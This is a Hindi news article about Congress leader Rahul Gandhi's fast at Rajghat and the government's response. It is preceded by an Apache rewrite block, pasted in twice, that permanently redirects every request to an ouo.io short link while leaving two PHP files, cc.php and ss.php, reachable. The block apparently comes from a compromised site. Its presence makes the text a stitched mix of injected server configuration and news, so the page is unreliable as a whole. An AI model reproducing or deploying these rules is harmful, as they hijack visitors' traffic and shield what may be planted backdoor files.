
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 297
नई दिल्ली। दलितों के खिलाफ अत्याचार को लेकर कांग्रेस अध्यक्ष समेत कई कार्यकर्ता आज राजघाट पर अनशन पर बैठेंगे। बताया जा रहा है कि कांग्रेस कार्यकर्ता बीजेपी सरकार के खिलाफ और देश में सांप्रदायिक सौहार्द तथा शांति को बढ़ावा देने के लिए सभी राज्य और जिला मुख्यालयों में एकदिवसीय अनशन करेंगे। राष्ट्रीय राजधानी दिल्ली में राहुल गांधी दिल्ली प्रदेश कांग्रेस के प्रमुख अजय माकन और पार्टी कार्यकर्ताओं के साथ सीबीएसई पेपर लीक, पीएनबी घोटाले, कावेरी मुद्दे, आंध्र प्रदेश को विशेष राज्य का दर्जे देने और दलितों के खिलाफ हो रहे हमले जैसे महत्वपूर्ण विषयों पर संसद में चर्चा कराने में केंद्र सरकार की नाकामी के खिलाफ धरना देंगे। ‘शांति और सौहार्द इस देश की आत्मा में मिले हैं और इन्हें बचाने और बढ़ावा देने की जिम्मेदारी कांग्रेस की है।’ ये हैं उस चिट्ठी की पंक्तियां जो कांग्रेस की ओर से अपने सभी प्रदेश इकाइयों के पदाधिकारियों को भेजी गई हैं। कांग्रेस अध्यक्ष राहुल गांधी ने पार्टी की प्रदेश इकाइयों के प्रमुखों को समाज के सभी वर्गों में सौहार्द को बढ़ावा देने के लिए राष्ट्रव्यापी उपवास रखने के निर्देश दिए हैं। ये उपवास राज्य और जिला मुख्यालयों में आज रखने के लिए कहा गया है।
राहुल गांधी आज उपवास रखने के लिए सुबह 10 बजे राजघाट पहुंचे और गांधी समाधि के सामने बैठे। इस उपवास में उनके साथ कांग्रेस पार्टी के वे तमाम कार्यकर्ता मौजूद थेजिन्हें राहुल गांधी ने आज उपवास रखने का निर्देश दिया था।
वहीं मोदी सरकार ने विपक्ष पर फूट डालने की राजनीति करने का आरोप लगाया है। संसदीय कार्यमंत्री अनंत कुमार ने कहा है कि कांग्रेस लोकतंत्र का गला घोट रही है। संसद के कामकाज में व्यवधान की ओर जनता का ध्यान आकृष्ट करने के लिए बीजेपी सांसद अपने-अपने निर्वाचन क्षेत्रों में 12 अप्रैल को एक दिन का उपवास रखेंगे। सरकार ने विपक्ष पर फूट डालने की राजनीति करने का आरोप लगाया है। संसदीय कार्यमंत्री अनंत कुमार ने कहा, कांग्रेस लोकतंत्र का गला घोट रही है।